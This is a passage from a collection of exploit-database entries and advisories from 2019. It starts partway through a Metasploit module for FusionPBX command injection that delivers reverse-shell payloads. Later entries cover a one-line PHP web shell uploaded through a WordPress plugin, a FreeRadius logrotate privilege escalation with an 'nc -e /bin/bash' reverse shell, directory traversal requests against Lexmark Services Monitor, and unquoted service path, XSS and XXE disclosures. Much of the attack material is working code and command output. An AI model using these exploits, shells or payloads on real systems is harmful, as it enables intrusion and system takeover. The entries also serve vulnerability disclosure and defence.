        in FusionPBX versions 4.4.3 and prior.

        The `exec.php` file within the Operator Panel permits users with
        `operator_panel_view` permissions, or administrator permissions,
        to execute arbitrary commands as the web server user by sending
        a `system` command to the FreeSWITCH event socket interface.

        This module has been tested successfully on FusionPBX version
        4.4.1 on Ubuntu 19.04 (x64).
      },
'License'         => MSF_LICENSE,
'Author'          =>
        [
'Dustin Cobb', # Discovery and exploit
'bcoles'       # Metasploit
        ],
'References'      =>
        [
          ['CVE', '2019-11409'],
          ['EDB', '46985'],
          ['URL', 'https://blog.gdssecurity.com/labs/2019/6/7/rce-using-caller-id-multiple-vulnerabilities-in-fusionpbx.html'],
          ['URL', 'https://github.com/fusionpbx/fusionpbx/commit/e43ca27ba2d9c0109a6bf198fe2f8d79f63e0611']
        ],
'Platform'        => %w[unix linux],
'Arch'            => [ARCH_CMD, ARCH_X86, ARCH_X64],
'Payload'         => {'BadChars' => "\x00\x0a\x0d\x27\x5c"},
'CmdStagerFlavor' => %w[curl wget],
'Targets'         =>
        [
          ['Automatic (Unix In-Memory)',
'Platform'       => 'unix',
'Arch'           => ARCH_CMD,
'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse'},
'Type'           => :unix_memory
          ],
          ['Automatic (Linux Dropper)',
'Platform'       => 'linux',
'Arch'           => [ARCH_X86, ARCH_X64],
'DefaultOptions' => {'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp'},
'Type'           => :linux_dropper
          ]
        ],
'Privileged'      => false,
'DefaultOptions'  => { 'SSL' => true, 'RPORT' => 443 },
'DisclosureDate'  => '2019-06-06',
'DefaultTarget'   => 0))
    register_options [
      OptString.new('TARGETURI', [true, 'The base path to FusionPBX', '/']),
      OptString.new('USERNAME', [true, 'The username for FusionPBX']),
      OptString.new('PASSWORD', [true, 'The password for FusionPBX'])
    ]
  end

  def login(user, pass)
    vprint_status "Authenticating as user '#{user}'"

    vars_post = {
      username: user,
      password: pass,
      path: ''
    }

    res = send_request_cgi({
'method'    => 'POST',
'uri'       => normalize_uri(target_uri.path, 'core/user_settings/user_dashboard.php'),
'vars_post' => vars_post
    })

    unless res
      fail_with Failure::Unreachable, 'Connection failed'
    end

    if res.code == 302 && res.headers['location'].include?('login.php')
      fail_with Failure::NoAccess, "Login failed for user '#{user}'"
    end

    unless res.code == 200
      fail_with Failure::UnexpectedReply, "Unexpected HTTP response status code #{res.code}"
    end

    cookie = res.get_cookies.to_s.scan(/PHPSESSID=(.+?);/).flatten.first

    unless cookie
      fail_with Failure::UnexpectedReply, 'Failed to retrieve PHPSESSID cookie'
    end

    print_good "Authenticated as user '#{user}'"

    cookie
  end

  def check
    res = send_request_cgi({
'uri' => normalize_uri(target_uri.path)
    })

    unless res
      vprint_error 'Connection failed'
      return CheckCode::Unknown
    end

    if res.body.include?('FusionPBX')
      return CheckCode::Detected
    end

    CheckCode::Safe
  end

  def execute_command(cmd, opts = {})
    res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'app/operator_panel/exec.php'),
'cookie'  => "PHPSESSID=#{@cookie}",
'vars_get' => {'cmd' => "bg_system #{cmd}"}
    }, 5)

    unless res
      return if session_created?
      fail_with Failure::Unreachable, 'Connection failed'
    end

    unless res.code == 200
      fail_with Failure::UnexpectedReply, "Unexpected HTTP response status code #{res.code}"
    end

    if res.body.include? 'access denied'
      fail_with Failure::NoAccess, "User #{datastore['USERNAME']} does not have permission to access the Operator Panel"
    end

    res
  end

  def exploit
    unless check == CheckCode::Detected
      fail_with Failure::NotVulnerable, "#{peer} - Target is not vulnerable"
    end

    @cookie = login(datastore['USERNAME'], datastore['PASSWORD'])

    print_status "Sending payload (#{payload.encoded.length} bytes) ..."

    case target['Type']
    when :unix_memory
      execute_command(payload.encoded)
    when :linux_dropper
      execute_cmdstager(:linemax => 1_500)
    end
  end
end

# Exploit Title: Shrew Soft VPN Client 2.2.2 - 'iked' Unquoted Service Path
# Date: 2019-11-14
# Exploit Author: D.Goedecke
# Vendor Homepage: www.shrew.net
# Software Link: https://www.shrew.net/download/vpn/vpn-client-2.2.2-release.exe
# Version: 2.2.2
# Tested on: Windows 10 64bit


C:\Users\user>wmic service get name, displayname, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """
ShrewSoft IKE Daemon iked                                        C:\Program Files\ShrewSoft\VPN Client\iked.exe -service Auto
ShrewSoft IPSEC Daemon ipsecd                                    C:\Program Files\ShrewSoft\VPN Client\ipsecd.exe -service Auto 


C:\Users\user>sc qc iked
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: iked
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\ShrewSoft\VPN Client\iked.exe -service
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : ShrewSoft IKE Daemon
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

C:\Users\user>sc qc ipsecd
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: ipsecd
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\ShrewSoft\VPN Client\ipsecd.exe -service
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : ShrewSoft IPSEC Daemon
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem 



#Exploit:
============
A successful attempt would require the local user to be able to insert
their code in the system root path undetected by the OS or other
security applications where it could potentially be executed during
application startup or reboot. If successful, the local user's code
would execute with the elevated privileges of the application.

Centraleyezer: Unrestricted File Upload -[CVE-2019-12271]

Sandline Centraleyezer (On Premises) allows unrestricted File Upload with a dangerous type, because the feature of adding “.jpg” to any uploaded filename is not enforced on the server side.

The image upload is vulnerable to bypass, the file upload adds .jpg extension to every file sent, but on client side, so I could intercept the request and change it to .php. I uploaded a simple shell and was able to execute commands as user www-data on the server.

more information:

https://link.medium.com/Y2S4ZJbMy1

=============================================
PRESTIGIA SEGURIDAD ALERT 2019-001
- Original release date: July 31, 2019
- Last revised:  November 13, 2019
- Discovered by: Prestigia Seguridad
- Severity: 7,5/10 (CVSS Base Score)
- CVE-ID: CVE-2019-14467
=============================================

I. VULNERABILITY
-------------------------
WordPress Plugin Social Photo Gallery 1.0 - Remote Code Execution

II. BACKGROUND
-------------------------
Social Gallery is the ultimate lightbox plugin for WordPress. Your images 
deserve to be experienced and shared, to spark a response as they travel 
the social web, and to work for you by generating more fans and more Likes 
for your content.

III. DESCRIPTION
-------------------------
The version of WordPress Plugin Social Photo Gallery is affected by a 
Remote Code Execution vulnerability.

The application does not check the extension when a imagen of a album is 
uploaded, resulting in a execution of php code.

To exploit the vulnerability only is needed create a album in the 
application and attach a malicious php file in the cover photo album.

IV. PROOF OF CONCEPT
-------------------------

1. Create a .php archive (cmd.php):

<?php system($_GET['cmd']); ?>

2. Click Add Album, select the name, for example "demo" and in the "Cover 
Photo" select the cmd.php file.

3. Load the next URL and magic:

http://127.0.0.1/wordpress/wp-content/uploads/socialphotogallery/demo/cmd.php?cmd=ls

V. BUSINESS IMPACT
-------------------------
Execute local commands in the server result from these attacks.

VI. SYSTEMS AFFECTED
-------------------------
WordPress Plugin Social Photo Gallery 1.0

VII. SOLUTION
-------------------------
The solution is only allow upload Digital Image Files: TIFF, JPEG, GIF, PNG

VIII. REFERENCES
-------------------------
https://wordpress.org/plugins/social-photo-gallery/

IX. CREDITS
-------------------------
This vulnerability has been discovered and reported by Prestigia Seguridad
Email: info@prestigiaonline.com

X. REVISION HISTORY
-------------------------
July 31, 2019 1: Initial release
November 13, 2019 2: Revision to send to lists

XI. DISCLOSURE TIMELINE
-------------------------
July 31, 2019 1: Vulnerability acquired by Prestigia Seguridad
July 31, 2019 2: Email to vendor without response
August 15, 2019 3: Second email to vendor without response
November 13, 2019 4: Send to the Full-Disclosure lists

XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with no 
warranties or guarantees of fitness of use or otherwise.

XIII. ABOUT
-------------------------
Prestigia Seguridad
https://seguridad.prestigia.es/

I. VULNERABILITY
-------------------------
Stored XSS Vulnerability on TP-Link Archer VR300 v1 - firmware
version: 1.3.0 0.8.0 v007b.1 build 180905 Rel.55344n

II. CVE REFERENCE
-------------------------
-

III. VENDOR
-------------------------
https://www.tp-link.com/

IV. TIMELINE
-------------------------
04/10/2018 Vulnerability discovered
05/10/2018 Vendor contacted
no Response

V. CREDIT
-------------------------
Okan Coşkun from Biznet Bilisim A.S.
Halil Arı From Biznet Bilisim A.S

VI. DESCRIPTION
-------------------------
Tp-Link Router interface is affected by stored XSS vulnerability. A
remote attacker could steal victims cookie or redirect victim to
malicious site.

VII. PROOF OF CONCEPT
-------------------------
Affected Component: VPN Name
Path(inurl): /cgi?3
Affected parameter: connName

On TP-Link Router Interface adding VPN configurations with malicious
VPN Name could execute arbitrary javascript.

I. VULNERABILITY
-------------------------
Raritan CommandCenter Secure Gateway XML External Entity

II. CVE REFERENCE
-------------------------
CVE-2018-20687

III. VENDOR
-------------------------
https://www.raritan.com/support/product/commandcenter-secure-gateway

IV. TIMELINE
------------------------
04/01/2019 Vulnerability discovered
07/01/2019 Vendor contacted

V. CREDIT
-------------------------
Okan Coşkun from Biznet Bilisim A.S.
Faruk Ünal From Biznet Bilisim A.S.

VI. DESCRIPTION
-------------------------
Raritan CommandCenter Secure Gateway version prior 8.0.0 affected by
XXE. A remote unauthenticated attacker may lead to the disclosure of
confidential data, denial of service, server side request forgery,
port scanning from the perspective of the machine where the parser is
located, and other system impacts by using this vulnerability.

Vulnerable path: /CommandCenterWebServices/.*

VII. SOLUTION
-------------------------
Update current CommandCenter Secure Gateway

VIII. REFERENCES
-------------------------

You can find more information about XXE from the link below:
https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing

I. VULNERABILITY
-------------------------
XSS Vulnerability on Raritan CommandCenter Secure Gateway

II. CVE REFERENCE
-------------------------
-

III. VENDOR
-------------------------
https://www.raritan.com/support/product/commandcenter-secure-gateway

IV. TIMELINE
-------------------------
30/01/2019 Vulnerability discovered
30/01/2019 Vendor contacted
27/02/2019 Raritan replied as "this fix is scheduled for release version 8.0"
06/05/2019 Version 8.0 is released

V. CREDIT
-------------------------
Okan Coşkun from Biznet Bilisim A.S.
Alp Hısım from Biznet Bilisim A.S.

VI. DESCRIPTION
-------------------------
Prior versions of Raritan CommandCenter Secure Gateway 8.0 affected
from XSS vulnerability. A remote attacker could steal victims cookie
or redirect victim to malicious site.

VII. PROOF OF CONCEPT
-------------------------
Affected Component:
Path(inurl): /access/MacroFileUploadServlet
Affected parameter: macroFile

MacroFileUpload of Raritan CC-SG affected from XSS vulnerability. A
remote attacker could steal victims cookie or redirect victim to
malicious site.

# Privilege Escalation via Logrotate in FreeRadius

## Overview
Identifier: AIT-SA-20191112-01
Target: FreeRadius
Vendor: FreeRadius
Version: all versions including 3.0.19
Fixed in Version: 12.2.3, 12.1.8 and 12.0.8
CVE: https://nvd.nist.gov/vuln/detail/CVE-2019-10143
Accessibility: Local
Severity: Low
Author: Wolfgang Hotwagner (AIT Austrian Institute of Technology)

## Summary
[FreeRadius is a modular Open-Source RADIUS suite.](https://freeradius.org/)

## Vulnerability Description
The ownership of the logdirectory "radacct" belongs to user "radiusd". User "radiusd" can elevate the privileges to "root" because of an unsafe interaction with logrotate.
User "radiusd" owns the log directory /var/log/radius/radacct:

```
drwx------. 3 radiusd radiusd 4096 26. Apr 16:01 /var/log/radius/radacct/
```
Log files rotate once a day(or any other frequency if configured) by logrotate as user root. The configuration does not use the "su" directive:

```
/var/log/radius/radacct/*/detail {
        monthly
        rotate 4
        nocreate
        missingok
        compress
}
```

Since logrotate is prone to a race-condition(see https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition) it is possible for user "radiusd" to replace the

directory /var/log/radius/radacct/logdir with a symbolic link to any directory(for example /etc/bash_completion.d). logrotate will place the compressed files AS ROOT into /etc/bash_completition.d and set the owner and group to "radiusd.radiusd". An attacker could simply place a reverse-shell into this file. As soon as root logs in, a reverse shell will be executed then.

Details of the race-condition in logrotate can be found at:

*   https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition
*   https://tech.feedyourhead.at/content/abusing-a-race-condition-in-logrotate-to-elevate-privileges
*   https://github.com/whotwagner/logrotten

## Proof of Concept
The following example illustrates how an attacker who already gained a shell as user "radiusd", can elevate his privileges to "root". After downloading and compiling, the exploit gets executed and waits until the next daily run of logrotate.  If the rotation of the log file succeeds, a new file that contains the reverse shell payload, will be written into /etc/bash_completition.d/ with owner "radiusd". As soon as root logs in, the reverse shell gets executed and opens a shell on the attackers netcat listener:

```
radiusd@redhat7:~$ git clone https://github.com/whotwagner/logrotten.git /tmp/logrotten
Cloning into '/tmp/logrotten'...
remote: Enumerating objects: 84, done.
remote: Counting objects: 100% (84/84), done.
remote: Compressing objects: 100% (58/58), done.
remote: Total 84 (delta 35), reused 64 (delta 24), pack-reused 0
Unpacking objects: 100% (84/84), done.
radiusd@redhat7:~$ mkdir -p /var/log/radius/radacct/logdir
radiusd@redhat7:~$ touch /var/log/radius/radacct/logdir/detail
radiusd@redhat7:~$ cd /tmp/logrotten && gcc -o logrotten logrotten.c
radiusd@redhat7:/tmp/logrotten$ ./logrotten -c /var/log/radius/radacct/logdir/detail
Waiting for rotating /var/log/radius/radacct/logdir/detail...
Renamed /var/log/radius/radacct/logdir/detail with /var/log/radius/radacct/logdir/detail2 and created symlink to /etc/bash_completion.d
Done!
radiusd@redhat7:/tmp/logrotten$ ls -l /etc/bash_completion.d/
total 20
-rw-r--r-- 1 root root 11144 Oct 28  2018 grub
-rw-r--r-- 1 radiusd  radiusd     33 May 12 18:44 detail.1.gz
radiusd@redhat7:/tmp/logrotten$ echo  "if [ \`id -u\` -eq 0 ]; then (/bin/nc -e /bin/bash localhost 3333 &); fi"> /etc/bash_completion.d/detail.1.gz
radiusd@redhat7:/tmp/logrotten$ nc -nvlp 3333
listening on [any] 3333 ...
connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 55526
id
uid=0(root) gid=0(root) groups=0(root)
```

## Vulnerable Versions
All versions including 3.0.19

## Tested Versions
Name : freeradius
Architecture: x86_64
Version: 3.0.13
Release: 9.el7_5

## Impact
An attacker who already achieved a valid shell as user "radiusd" could elevate the privileges to "root". The fact that another exploit is needed to get a shell lowers the severity from high to low.

## Mitigation
Add "su radiusd:radiusd" to all log sections in /etc/logrotate.d/radiusd.
By keeping SELinux in "Enforcing" mode, the "radiusd" user will be limited in the directories he can write to.

## References:
*  https://access.redhat.com/security/cve/cve-2019-10143
*  https://nvd.nist.gov/vuln/detail/CVE-2019-10143

## Vendor Contact Timeline

* `2019-05-01` Contacting RedHat
* `2019-05-07` RedHat opens issue at the vendor bugtracker
* `2019-05-23` CVE gets assigned to the issue
* `2019-05-24` FreeRadius is skeptical about the "security" impact
* `2019-11-12` Public disclosure

## Notes
This CVE is disputed because the vendor [stated that there is no known remote code execution in freeradius that allows an attacker to gain a shell as user "radiusd"]( https://freeradius.org/security/).  CVE's are not only assigned for vulnerabilities but also for exposures that allow attacker to have a stronger impact after a successful attack. Therefore we believe that it is important to file this issue as a security related bug.

## Advisory URL
https://www.ait.ac.at/ait-sa-20191112-01-privilege-escalation-via-logrotate-in-freeradius

# Exploit Title: iSmartViewPro 1.3.34 - Denial of Service (PoC)
# Discovery by: Ivan Marmolejo
# Discovery Date: 2019 -11-16
# Vendor Homepage: http://www.smarteyegroup.com/
# Software Link: https://apps.apple.com/mx/app/ismartviewpro/id834791071
# Tested Version: 1.3.34
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: iPhone 6s - iOS 13.2

##############################################################################################################################################

Summary: This app is specially built for P2P IP camera series. thanks to unique P2P connection technology that users are able to watch live 
video on iPhone from any purchased IP camera by simply enter camera's ID and password; no complex IP or router settings. The app have a lot of
functions, such as local record video, set ftp params, set email, set motion alarm and so on.

##############################################################################################################################################

Steps to Produce the Crash:

   1.- Run python code: iSmartViewPro.py
   2.- Copy content to clipboard
   3.- Open App "iSmartViewPro"
   4.- Go to "Add Camera"
   5.- go to "Add network cameras"
   6.- Paste ClipBoard on "Camara DID"
   7.- Paste ClipBoard on "Password"
   8.- Next
   9.- Crashed

##############################################################################################################################################

Python "iSmartViewPro" Code:

   buffer = "\x41" * 257
   print (buffer)

##############################################################################################################################################

# Exploit Title: NCP_Secure_Entry_Client 9.2 - Unquoted Service Paths
# Date: 2019-11-17
# Exploit Author: Akif Mohamed Ik
# Vendor Homepage: http://software.ncp-e.com/
# Software Link: http://software.ncp-e.com/NCP_Secure_Entry_Client/Windows/9.2x/
# Version: 9.2x
# Tested on: Windows 7 SP1
# CVE : NA
C:\Users\user>wmic service get name, displayname, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """

ncprwsnt                                                        ncprwsnt
                C:\Program Files (x86)\NCP\SecureClient\ncprwsnt.exe
                           Auto
rwsrsu                                                          rwsrsu
                C:\Program Files (x86)\NCP\SecureClient\rwsrsu.exe
                           Auto
ncpclcfg                                                        ncpclcfg
                C:\Program Files (x86)\NCP\SecureClient\ncpclcfg.exe
                           Auto
NcpSec                                                          NcpSec
                C:\Program Files (x86)\NCP\SecureClient\NCPSEC.EXE
                           Auto

C:\Users\ADMIN>sc qc ncprwsnt             
[SC] QueryServiceConfig SUCCESS  
    SERVICE_NAME: ncprwsnt
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\NCP\SecureClient\ncprwsnt.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : ncprwsnt
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

C:\Users\ADMIN>sc qc rwsrsu
[SC] QueryServiceConfig SUCCESS

        SERVICE_NAME       : rwsrsu
        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\NCP\SecureClient\rwsrsu.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : rwsrsu
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

C:\Users\ADMIN>sc qc ncpclcfg
[SC] QueryServiceConfig SUCCESS

        SERVICE_NAME       : ncpclcfg
        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\NCP\SecureClient\ncpclcfg.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : ncpclcfg
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem    

C:\Users\ADMIN>sc qc NcpSec
[SC] QueryServiceConfig SUCCESS

        SERVICE_NAME       : NcpSec
        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\NCP\SecureClient\NCPSEC.EXE
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : NcpSec
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

#Exploit:

A successful attempt would require the local user to be able to insert
their code in the system root path undetected by the OS or other
security applications where it could potentially be executed during
application startup or reboot. If successful, the local user's code
would execute with the elevated privileges of the application.

# Exploit Title: Emerson PAC Machine Edition 9.70 Build 8595 - 'FxControlRuntime' Unquoted Service Path
# Discovery by: Luis Martinez
# Discovery Date: 2019-11-17
# Vendor Homepage: https://www.emerson.com/en-us
# Software Link : https://www.opertek.com/descargar-software/?prc=_326
# Tested Version: 9.70 Build 8595
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 Pro x64 es

# Step to discover Unquoted Service Path: 

C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "FxControlRuntime" |findstr /i /v """

FxControl Runtime  FxControlRuntime  C:\Program Files (x86)\Emerson\PAC Machine Edition\fxControl\Runtime\NT\FxControl.exe  Auto

# Service info:

C:\>sc qc FxControlRuntime
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: FxControlRuntime
        TYPE               : 120  WIN32_SHARE_PROCESS (interactive)
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\Emerson\PAC Machine Edition\fxControl\Runtime\NT\FxControl.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : FxControl Runtime
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

#Exploit:

A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.

# Exploit Title: ASUS HM Com Service 1.00.31 - 'asHMComSvc' Unquoted Service Path
# Date: 2019-11-16
# Exploit Author : Olimpia Saucedo
# Vendor Homepage: www.asus.com
# Version:  1.00.31
# Tested on: Windows 10 Pro x64  (but it should works on all windows version)

The application suffers from an unquoted service path issue impacting the service 'ASUS HM Com Service (aaHMSvc.exe)' related to the Asus Motherboard Utilities.
This could potentially allow an authorized but non-privileged local user to execute arbitrary code with system privileges.

POC:

>wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """

ASUS HM Com Service      asHmComSvc
C:\Program Files (x86)\ASUS\AAHM\1.00.31\aaHMSvc.exe
Auto

>sc qc "asHMComSvc"
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: asHMComSvc
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\ASUS\AAHM\1.00.31\aaHMSvc.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : ASUS HM Com Service
        DEPENDENCIES       : RpcSs
        SERVICE_START_NAME : LocalSystem

# Exploit Title: Lexmark Services Monitor 2.27.4.0.39 - Directory Traversal
# Google Dork: N/A​
# Date: 2019​-11-15
# Exploit Author: Kevin Randall​
# Vendor Homepage: https://www.lexmark.com/en_us.html​
# Software Link: https://www.lexmark.com/en_us.html​
# Version: 2.27.4.0.39 (Latest Version)​
# Tested on: Windows Server 2012​
# CVE : N/A
​
​
Vulnerability: Lexmark Services Monitor (Version 2.27.4.0.39) Runs on TCP Port 2070. The latest version is vulnerable to a Directory Traversal and Local File Inclusion vulnerability.​
​
Timeline:​
Discovered on: 9/24/2019​
Vendor Notified: 9/24/2019​
Vendor Confirmed Receipt of Vulnerability: 9/24/2019​
Follow up with Vendor: 9/25/2019​
Vendor Sent to Engineers to confirm validity: 9/25/2019 - 9/26/2019​
Vendor Confirmed Vulnerability is Valid: 9/26/2019​
Vendor Said Software is EOL (End of Life). Users should upgrade/migrate all LSM with LRAM. No fix/patch will be made: 9/27/2019​
Vendor Confirmed Signoff to Disclose: 9/27/2019​
Final Email Sent: 9/27/2019​
Public Disclosure: 11/15/2019​
​
PoC:​
​
GET /../../../../../../windows/SysWOW64/PerfStringBackup.ini HTTP/1.1​
TE: deflate,gzip;q=0.3​
Connection: TE, close​
Host: 10.200.15.70:2070​
User-Agent: Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20​
​
HTTP/1.0 200 OK​
Server: rXpress​
Content-Length: 848536​
​
​
.​
.​
.​
.[.P.e.r.f.l.i.b.].​
.​
.B.a.s.e. .I.n.d.e.x.=.1.8.4.7.​
.​
.L.a.s.t. .C.o.u.n.t.e.r.=.3.3.3.4.6.​
.​
.L.a.s.t. .H.e.l.p.=.3.3.3.4.7.​
.​
.​
.​
.[.P.E.R.F._...N.E.T. .C.L.R. .D.a.t.a.].​
.​
.F.i.r.s.t. .C.o.u.n.t.e.r.=.5.0.2.8.​
.​
.F.i.r.s.t. .H.e.l.p.=.5.0.2.9.​
.​
.L.a.s.t. .C.o.u.n.t.e.r.=.5.0.4.0.​
.​
.L.a.s.t. .H.e.l.p.=.5.0.4.1.​
.​
.​
.​
.[.P.E.R.F._...N.E.T. .C.L.R. .N.e.t.w.o.r.k.i.n.g.].​
.​
.F.i.r.s.t. .C.o.u.n.t.e.r.=.4.9.8.6.​
​
​
GET /../../../../../windows/SysWOW64/slmgr/0409/slmgr.ini HTTP/1.1​
TE: deflate,gzip;q=0.3​
Connection: TE, close​
Host: 10.200.15.70:2070​
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.3​
​
HTTP/1.0 200 OK​
Server: rXpress​
Content-Length: 38710​
​
..[.S.t.r.i.n.g.s.].​
.​
.L._.o.p.t.I.n.s.t.a.l.l.P.r.o.d.u.c.t.K.e.y.=.".i.p.k.".​
.​
.L._.o.p.t.I.n.s.t.a.l.l.P.r.o.d.u.c.t.K.e.y.U.s.a.g.e.=.".I.n.s.t.a.l.l. .p.r.o.d.u.c.t. .k.e.y. .(.r.e.p.l.a.c.e.s. .e.x.i.s.t.i.n.g. .k.e.y.).".​
.​
.L._.o.p.t.U.n.i.n.s.t.a.l.l.P.r.o.d.u.c.t.K.e.y.=.".u.p.k.".​
.​
.L._.o.p.t.U.n.i.n.s.t.a.l.l.P.r.o.d.u.c.t.K.e.y.U.s.a.g.e.=.".U.n.i.n.s.t.a.l.l. .p.r.o.d.u.c.t. .k.e.y.".​
.​
.L._.o.p.t.A.c.t.i.v.a.t.e.P.r.o.d.u.c.t.=.".a.t.o.".​
.​
.L._.o.p.t.A.c.t.i.v.a.t.e.P.r.o.d.u.c.t.U.s.a.g.e.=.".A.c.t.i.v.a.t.e. .W.i.n.d.o.w.s.".​
.​
.L._.o.p.t.D.i.s.p.l.a.y.I.n.f.o.r.m.a.t.i.o.n.=.".d.l.i.".​
.​
.L._.o.p.t.D.i.s.p.l.a.y.I.n.f.o.r.m.a.t.i.o.n.U.s.a.g.e.=.".D.i.s.p.l.a.y. .l.i.c.e.n.s.e. .i.n.f.o.r.m.a.t.i.o.n. .(.d.e.f.a.u.l.t.:. .c.u.r.r.e.n.t. .l.i.c.e.n.s.e.).".​
.​
.L._.o.p.t.D.i.s.p.l.a.y.I.n.f.o.r.m.a.t.i.o.n.V.e.r.b.o.s.e.=.".d.l.v.".​
.​
.L._.o.p.t.D.i.s.p.l.a.y.I.n.f.o.r.m.a.t.i.o.n.U.s.a.g.e.V.e.r.b.o.s.e.=.".D.i.s.p.l.a.y. .d.e.t.a.i.l.e.d. .l.i.c.e.n.s.e. .i.n.f.o.r.m.a.t.i.o.n. .(.d.e.f.a.u.l.t.:. .c.u.r.r.e.n.t. .l.i.c.e.n.s.e.).".​
.​
.L._.o.p.t.E.x.p.i.r.a.t.i.o.n.D.a.t.i.m.e.=.".x.p.r.".​
​
​
​
​
GET /../../../../../windows/system32/drivers/etc/services HTTP/1.1​
TE: deflate,gzip;q=0.3​
Connection: TE, close​
Host: 10.200.15.70:2070​
User-Agent: Opera/9.50 (Macintosh; Intel Mac OS X; U; de)​
​
HTTP/1.0 200 OK​
Server: rXpress​
Content-Length: 17463​
​
# Copyright (c) 1993-2004 Microsoft Corp.​
#​
# This file contains port numbers for well-known services defined by IANA​
#​
# Format:​
#​
# <service name>  <port number>/<protocol>  [aliases...]   [#<comment>]​
#​
​
echo                7/tcp​
echo                7/udp​
discard             9/tcp    sink null​
discard             9/udp    sink null​
systat             11/tcp    users                  #Active users​
systat             11/udp    users                  #Active users​
daytime            13/tcp​
daytime            13/udp​
qotd               17/tcp    quote                  #Quote of the day​
qotd               17/udp    quote                  #Quote of the day​
chargen            19/tcp    ttytst source          #Character generator​
chargen            19/udp    ttytst source          #Character generator​
ftp-data           20/tcp                           #FTP, data​
ftp                21/tcp                           #FTP. control​
ssh                22/tcp                           #SSH Remote Login Protocol​
telnet             23/tcp​
smtp               25/tcp    mail                   #Simple Mail Transfer Protocol​
time               37/tcp    timserver